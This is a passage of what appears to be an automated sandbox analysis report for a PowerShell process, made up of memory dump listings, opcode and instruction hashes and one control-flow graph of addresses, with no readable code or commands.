                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (&jq
                                                  • API String ID: 0-3222446104
                                                  • Opcode ID: c9b2512fb006f2302532a3327093df40a728891a651fe795cafe3d2b1affd9d2
                                                  • Instruction ID: b964f1e70f2d22d2177f565317a32fc5842986db2a2f8fd929ce25a24a97daca
                                                  • Opcode Fuzzy Hash: c9b2512fb006f2302532a3327093df40a728891a651fe795cafe3d2b1affd9d2
                                                  • Instruction Fuzzy Hash: AE21A175E042588FDB14DFAED44479EBFF5EB89320F14846AD408A7340CA74A845CBE5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 756 7e52700-7e52725 757 7e528c4-7e5290d 756->757 758 7e5272b-7e52730 756->758 770 7e52913-7e52918 757->770 771 7e52a5c-7e52a7d 757->771 759 7e52732-7e52738 758->759 760 7e52748-7e5274c 758->760 764 7e5273c-7e52746 759->764 765 7e5273a 759->765 761 7e52871-7e5287b 760->761 762 7e52752-7e52756 760->762 766 7e5287d-7e52886 761->766 767 7e52889-7e5288f 761->767 768 7e52769 762->768 769 7e52758-7e52767 762->769 764->760 765->760 775 7e52895-7e528a1 767->775 776 7e52891-7e52893 767->776 777 7e5276b-7e5276d 768->777 769->777 772 7e52930-7e52934 770->772 773 7e5291a-7e52920 770->773 788 7e52a37-7e52a3c 771->788 789 7e52a7f-7e52aa6 771->789 781 7e52a0c-7e52a16 772->781 782 7e5293a-7e5293c 772->782 778 7e52924-7e5292e 773->778 779 7e52922 773->779 780 7e528a3-7e528c1 775->780 776->780 777->761 784 7e52773-7e52775 777->784 778->772 779->772 790 7e52a24-7e52a2a 781->790 791 7e52a18-7e52a21 781->791 786 7e5294c 782->786 787 7e5293e-7e5294a 782->787 792 7e52785 784->792 793 7e52777-7e52783 784->793 795 7e5294e-7e52950 786->795 787->795 803 7e52a3e-7e52a59 788->803 810 7e52aa8 789->810 811 7e52aaa-7e52aac 789->811 798 7e52a30-7e52a32 790->798 799 7e52a2c-7e52a2e 790->799 797 7e52787-7e52789 792->797 793->797 795->781 801 7e52956-7e5296e 795->801 797->761 802 7e5278f-7e527a9 797->802 798->788 799->803 812 7e52970-7e52976 801->812 813 7e52988-7e5298c 801->813 814 7e527cc 802->814 815 7e527ab-7e527b4 802->815 818 7e52ab6 810->818 811->818 819 7e52978 812->819 820 7e5297a-7e52986 812->820 853 7e5298f call 4f9e249 813->853 854 7e5298f call 4f9e258 813->854 817 7e527cf-7e527d1 814->817 821 7e527b6-7e527b9 815->821 822 7e527bb-7e527c8 815->822 825 7e527d3-7e527d9 817->825 826 7e527eb-7e527f1 817->826 819->813 820->813 823 7e527ca 821->823 822->823 823->817 824 7e52992-7e52999 829 7e529a0-7e529fd 824->829 830 7e5299b-7e5299e 824->830 831 7e527dd-7e527e9 825->831 832 7e527db 825->832 855 7e527f4 call 4f97099 826->855 856 7e527f4 call 4f970a8 826->856 857 7e527f4 call 4f97081 826->857 833 7e52a02-7e52a09 829->833 830->833 831->826 832->826 834 7e527f7-7e527fe 837 7e52805-7e52862 834->837 838 7e52800-7e52803 834->838 839 7e52867-7e5286e 837->839 838->839 853->824 854->824 855->834 856->834 857->834
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab37c573f76c16fecab99ee7c406784b71b18cf779807078d3dffbed16c38bf6
                                                  • Instruction ID: 8f63800c9e4438270d38220b2ce86aaebbdbdd0d139b966e13faa21aecc72473
                                                  • Opcode Fuzzy Hash: ab37c573f76c16fecab99ee7c406784b71b18cf779807078d3dffbed16c38bf6
                                                  • Instruction Fuzzy Hash: B5B139B1701219CFCB209BAC98416AABBE9FF85325F10846ADA05DF252CA35DD85C7B1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7df4478803e4393a851301e0aaf50e0583d31572acd17794d04b96a694c1497e
                                                  • Instruction ID: 27f3f62fd7524c66afba1b65012ccf674af3e4d74670176e1a269491e610b009
                                                  • Opcode Fuzzy Hash: 7df4478803e4393a851301e0aaf50e0583d31572acd17794d04b96a694c1497e
                                                  • Instruction Fuzzy Hash: EE918974A002099FCB15CF58C5949AEFBF1FF88310B258999D915AB3A5C735FC82CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe2c52e291b042ed57ffe12dd3ae33c59efb803357dafce743b26569b1abe665
                                                  • Instruction ID: 0c73a5a0d43cace8754b69d60f065c4d238aac271201f9e274c113903ceec4d7
                                                  • Opcode Fuzzy Hash: fe2c52e291b042ed57ffe12dd3ae33c59efb803357dafce743b26569b1abe665
                                                  • Instruction Fuzzy Hash: 445155B270121E8FCB219B6D94407ABBBE6DFC9225F14847BD905DB252DA31CD81C7A1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdccf187d301b2c01efb8fb4827f1189d2370a0dbce4c8a05ea01c1731b4df89
                                                  • Instruction ID: 7a7bf92ef98a24ddaef62341d0e46a58fcfb411aef1a8b6d02c429bb4449d66e
                                                  • Opcode Fuzzy Hash: fdccf187d301b2c01efb8fb4827f1189d2370a0dbce4c8a05ea01c1731b4df89
                                                  • Instruction Fuzzy Hash: 9C516238B002058FDB10EF6CDA8496ABBE5EFC9314B1485A9D549DF365DB74EC02CB92
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a974336747cdf5e4ff876fa78e036621091a905f1059a69335c306a57ff5ded7
                                                  • Instruction ID: 5c69015f1bd547dd8058b1b04d15c9cc978300f6fe1ec4006ac3df0e73ebf8fd
                                                  • Opcode Fuzzy Hash: a974336747cdf5e4ff876fa78e036621091a905f1059a69335c306a57ff5ded7
                                                  • Instruction Fuzzy Hash: 0E610671E002499FDB14DFA9D58469DFBF5FF88310F14812AE809AB264EB34AD46CB60
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d02ec4491ddbc7b603769b471784b8103f3b2265c11af700a909ef0277fca1f
                                                  • Instruction ID: a54d6a8f3487a53941476d4d7b2bfefacc2d9eb0c27cd251024fdda7107b1ac4
                                                  • Opcode Fuzzy Hash: 4d02ec4491ddbc7b603769b471784b8103f3b2265c11af700a909ef0277fca1f
                                                  • Instruction Fuzzy Hash: 4C51BC35710304DFEB04AB69D854A2A77EAFFC8354F248569E509CB352EB35EC02CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2993041eecb5697d0224119abf7e67ffa53d028e16c70cb0795c26394f27c0f5
                                                  • Instruction ID: 65346725df46ee40f5ae42ac5e0651791de78827bed04b488ac2c8928ed3f39a
                                                  • Opcode Fuzzy Hash: 2993041eecb5697d0224119abf7e67ffa53d028e16c70cb0795c26394f27c0f5
                                                  • Instruction Fuzzy Hash: CD511975E012499FDB14DF99D544A9DFBF1FF88310F14802AE819AB364EB34AC46CB50
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8530dc3ea05b961cfae5481585dcea22092b3d8d0ffa9f252edeb8d0e4730948
                                                  • Instruction ID: 05af769b43566c0556fb305b62a2e651b91a84d9a3c181d28861d7cb0a083012
                                                  • Opcode Fuzzy Hash: 8530dc3ea05b961cfae5481585dcea22092b3d8d0ffa9f252edeb8d0e4730948
                                                  • Instruction Fuzzy Hash: AD413038B002058FDB14EF6CD99492ABBE6EFD83147148569E545CF365EB74EC02CB52
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8bcf44adddb3c61f67622575ffb73b014ff84b55dc4df5b7193de0908ea5d69
                                                  • Instruction ID: 798d0d4ef35394fc00163e33c9d0a4e0c1b4ca06f93cb441cc9806e85448efea
                                                  • Opcode Fuzzy Hash: c8bcf44adddb3c61f67622575ffb73b014ff84b55dc4df5b7193de0908ea5d69
                                                  • Instruction Fuzzy Hash: 204116F1A1230ACFCB218A64C55166ABBF29F8978CF1480A6DD04DF251DB35DD85CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1325ac50530d6a9f7893d276f6466c2a28860e621fc8cf8a083b9f854bd41bbf
                                                  • Instruction ID: fb526ee46d4d42688c349356534b823c87bedc60ef1839535208d16de0b17356
                                                  • Opcode Fuzzy Hash: 1325ac50530d6a9f7893d276f6466c2a28860e621fc8cf8a083b9f854bd41bbf
                                                  • Instruction Fuzzy Hash: 3A410674A005059FDB09CF58C598DAAFBF1FF48320B168999D915AB365C732FC92CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5c54ebfab52e7b211f9a8f57dea429a74f2cc7d2ede2e61f637ebfd7a2ea6937
                                                  • Instruction ID: a528d63676188e82e038c66243744a627f8f3c8c28b644eab47dee590ad53424
                                                  • Opcode Fuzzy Hash: 5c54ebfab52e7b211f9a8f57dea429a74f2cc7d2ede2e61f637ebfd7a2ea6937
                                                  • Instruction Fuzzy Hash: EE316F34B04244CFDB05DF68C994AAABBF1AF89315F185098E401AB3A6DB31EC42CF60
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d50b005b64d2f96240f770d6fea5c6fa48f78f117ce73f658bb47fd823bbd7e3
                                                  • Instruction ID: 9b238dcf4ea4dd70168194a85aa2688d5d6ca3fdaf81f89dd0d75a9ddde8415a
                                                  • Opcode Fuzzy Hash: d50b005b64d2f96240f770d6fea5c6fa48f78f117ce73f658bb47fd823bbd7e3
                                                  • Instruction Fuzzy Hash: 893190353006019FD709EB78E854B9AB7EAEFC4211F008639D50ACB369DB75EC16CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2be0069786cb8444829158edd229a4a4399b70a31d600f3eb24de31ee4724436
                                                  • Instruction ID: 264fa22044c724526925ca2d50e1c310ae09f5f4cf92b22407ab015cfcd8674b
                                                  • Opcode Fuzzy Hash: 2be0069786cb8444829158edd229a4a4399b70a31d600f3eb24de31ee4724436
                                                  • Instruction Fuzzy Hash: 35317C74E002099FEB04DFA9D4907AEBBF6EF88314F148029E415EB764EB759C02CB55
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe26ffa8e856949a9cb71f0d576638b46c9cb4d5f26c65e98ed88cc2691be1c7
                                                  • Instruction ID: 2eadf433069b796287503f42a2f899bb40a7022c135664c668789801bb589256
                                                  • Opcode Fuzzy Hash: fe26ffa8e856949a9cb71f0d576638b46c9cb4d5f26c65e98ed88cc2691be1c7
                                                  • Instruction Fuzzy Hash: 61315274E002099FEF04DF69D5947AEBBF6EF88310F148029D415E7764FA759C028B55
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2398e3d17c1a34b3fc49bebf9844f5ad20634857a93e0b75fa3bd02e336456a9
                                                  • Instruction ID: f914f840d9fdd9ebbede6bc8b3bb98c4abf669b301aecdb70466acff03a219fd
                                                  • Opcode Fuzzy Hash: 2398e3d17c1a34b3fc49bebf9844f5ad20634857a93e0b75fa3bd02e336456a9
                                                  • Instruction Fuzzy Hash: 24314934A002048FCB14EF69D498A9EBBF2FF4C214F144569D446EB3A5DB71AC82CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 329526148de4dd86cfd4bc5239fd6422e7d9ef49f76d54efaf29096520481dbe
                                                  • Instruction ID: d8b661300534264fcbe2fabd976ba7197c776b6193381bd6a00f9583918a5616
                                                  • Opcode Fuzzy Hash: 329526148de4dd86cfd4bc5239fd6422e7d9ef49f76d54efaf29096520481dbe
                                                  • Instruction Fuzzy Hash: 553172B8E402459FEB04EFA4D554AAFBBF6EF88300F20846DC215AB394DA759D418F64
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5fc5eae0df484e7b4268fb5e527426bf4ccd6356881e557fcd8c4f78b096560
                                                  • Instruction ID: bbafeccd34461eb316a520bc50cd178596df45a9caa0c49bb131af7146aa528b
                                                  • Opcode Fuzzy Hash: f5fc5eae0df484e7b4268fb5e527426bf4ccd6356881e557fcd8c4f78b096560
                                                  • Instruction Fuzzy Hash: 2F21D6F5A1120ECFDF20CF59C545AA577E8BB45365F04E066DF189B250D334D984CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8728b42f0679acc7ecf68455f973e535d0e46cedf2eed36fd16bd192905b759
                                                  • Instruction ID: b3b4db66409239953773dd32a6f9af4aa92c389596c54475e722ff3775ca9d70
                                                  • Opcode Fuzzy Hash: d8728b42f0679acc7ecf68455f973e535d0e46cedf2eed36fd16bd192905b759
                                                  • Instruction Fuzzy Hash: 9E311434A002048FCB14EF69D498A9EBBF6EB8C214F144569D406EB395DF75AC82CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 439686ec136b4ddecdafbbaee60cac0ebc47a87c15d37f1cfe634c60f4298f13
                                                  • Instruction ID: 970eb76484529e3b34aa4885e1d67d0469a4340d047cd59adcdb167aff002f45
                                                  • Opcode Fuzzy Hash: 439686ec136b4ddecdafbbaee60cac0ebc47a87c15d37f1cfe634c60f4298f13
                                                  • Instruction Fuzzy Hash: 89313278E002059FEB04EF64D554ABF77F6EF88700F108469D215AB394DA75DD418F64
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d4f7441ab8ff8015d4fe06c3c0b66c75cef85d837101eff66bba068d7059298
                                                  • Instruction ID: 152a1c159809e3c5a0a3ffe2cac7b6cc3ad0bee314d2ba2ea85b6705f5363147
                                                  • Opcode Fuzzy Hash: 3d4f7441ab8ff8015d4fe06c3c0b66c75cef85d837101eff66bba068d7059298
                                                  • Instruction Fuzzy Hash: 78215C34B14245CFDB05EF64C854AADBFF1AF4A315F185099D402AB3A6DB31EC82CB64
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2152902704.000000000368D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0368D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_368d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b6b5cae61964b799ca52a77570f9f610c0008d6094258c6c37c0efb6f59081f
                                                  • Instruction ID: 8129733e0ae89a3b4bd04259c01335b7380be29cf069bf0c89533496439e1950
                                                  • Opcode Fuzzy Hash: 0b6b5cae61964b799ca52a77570f9f610c0008d6094258c6c37c0efb6f59081f
                                                  • Instruction Fuzzy Hash: B2219175604200DFDB05EF54EA80B16BB65EB88314F24C6AAE9094E357C73AD456CBB1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74163614db6f5e2bd73417e2d31f85ba9d5236a69071f2e9d78a03d605e0e2f4
                                                  • Instruction ID: b91e94e31331892929c24275bc11518dfcf8b68d4fe5ad70ee8c1e1eb9604b21
                                                  • Opcode Fuzzy Hash: 74163614db6f5e2bd73417e2d31f85ba9d5236a69071f2e9d78a03d605e0e2f4
                                                  • Instruction Fuzzy Hash: 19318BB4D063448EEB60CF6AD08879AFFE2EF88314F28C05DC44D97305D6B4A882CB61
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2152902704.000000000368D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0368D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_368d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd79aee4bffb68ba85e837f3dcd129a59062a5c543b33944e1931eebd28fd8d1
                                                  • Instruction ID: a34687f1e33caa204de00a42cbf0bd69fee3383ef6d4c531bd4b295e25477d0f
                                                  • Opcode Fuzzy Hash: bd79aee4bffb68ba85e837f3dcd129a59062a5c543b33944e1931eebd28fd8d1
                                                  • Instruction Fuzzy Hash: 3C21F275604244DFCB14EF24EAD0B26BFA9EB88314F24C6A9D9094F356C37AD446CA62
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9083de1fdb9f2a1c4ab1455ae025bf4977805b509b2d82bf5df5c40315d0de53
                                                  • Instruction ID: 33c0df4d0eac6d971617b071154a4ca3975becda0755b76df4d440d2af391c86
                                                  • Opcode Fuzzy Hash: 9083de1fdb9f2a1c4ab1455ae025bf4977805b509b2d82bf5df5c40315d0de53
                                                  • Instruction Fuzzy Hash: 95216BB4D057448EEBA0DF6AC08879AFFF6EB88310F28C01DD45D97305D6B4A882CB65
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1316b44f1147a748b871919d6ab7aa854aeee70514764541f0522c0225667936
                                                  • Instruction ID: 7d491e940ff3bf7b83a599089abab7dfcdbca07e080dd4519a8c739b3f24b127
                                                  • Opcode Fuzzy Hash: 1316b44f1147a748b871919d6ab7aa854aeee70514764541f0522c0225667936
                                                  • Instruction Fuzzy Hash: 3B111C3AB00218CFDF04EB69E94099E77F6EFCC655B1040A9E509EB365DB34ED128B91
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d23a650989b9d909b777effc61ac90040e1bb60daf24835dda58d75d7825beb
                                                  • Instruction ID: 13180697ba548e2254bc38ac39162f189f1fc47579d785f143d63c820a10505b
                                                  • Opcode Fuzzy Hash: 0d23a650989b9d909b777effc61ac90040e1bb60daf24835dda58d75d7825beb
                                                  • Instruction Fuzzy Hash: 1D11C4F1A0221EDFCB21DF5DC544BAAB7E1EF49359F0491AADD089B212D330D990CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fd04c252228f753919cba918710baf15616848b8e9926578bb426e862af4fa99
                                                  • Instruction ID: 4b45022048209634f0ae4da91e04e0c5314aebf1b8b3184ffad7c8003895c36c
                                                  • Opcode Fuzzy Hash: fd04c252228f753919cba918710baf15616848b8e9926578bb426e862af4fa99
                                                  • Instruction Fuzzy Hash: F101612260E3E01FE7169B7C5860AD73FA59F82214F1840EBC5C58B167D815884AC3AA
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2152902704.000000000368D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0368D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_368d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                  • Instruction ID: 092fea401db9b30c49e4896f249b0dcba7eaa524117ba27adc5894f92eff1e81
                                                  • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                  • Instruction Fuzzy Hash: 7E216D76504240DFCB06DF50D6C4B15BF72FB48214F28C6AAD9494E767C33AD45ACBA1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2152902704.000000000368D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0368D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_368d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                                  • Instruction ID: badc32a9b4b2ee259b3e0649a013d9eecccbd42a8e9b87b75431ba569b8df7c1
                                                  • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                                  • Instruction Fuzzy Hash: 3E11BB75504280CFCB12DF14E6D4B15BFA1FB88224F28C6AAD8494F756C33AD44ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a110dcf2856bd04cc6fe8118e52ff41d8d7f709e20deed412ad7e7741fa7163
                                                  • Instruction ID: 3e42182ab287005a2480750b5243c489f514fdae1ac1a43804543b77ac7648f6
                                                  • Opcode Fuzzy Hash: 9a110dcf2856bd04cc6fe8118e52ff41d8d7f709e20deed412ad7e7741fa7163
                                                  • Instruction Fuzzy Hash: 2F0126316087845FDB24CB39D5546567FF0EF46210F1944DED08ACBAA2CA60FC45C701
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d9ac2b10687106d1dbbe40fb52928737fb87f9257f1de6ed44ca3c7c4a48da0
                                                  • Instruction ID: 771b0331dbca920e64922bc36b2dda05694cac94f953c5e0186e61fe36614080
                                                  • Opcode Fuzzy Hash: 6d9ac2b10687106d1dbbe40fb52928737fb87f9257f1de6ed44ca3c7c4a48da0
                                                  • Instruction Fuzzy Hash: C1018035B002148FCB119F74E808AAEFBF5FB88215B04416DE51AD3642DB329912CB90
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f2222a75c901ee16c5b5bfa1469a7542e3b799aa598028b5c3c195a1760257c
                                                  • Instruction ID: bb6dc51cbb8d50d274d8c5a1e5ce532f88a1fb430271647910afd76c25d057e3
                                                  • Opcode Fuzzy Hash: 7f2222a75c901ee16c5b5bfa1469a7542e3b799aa598028b5c3c195a1760257c
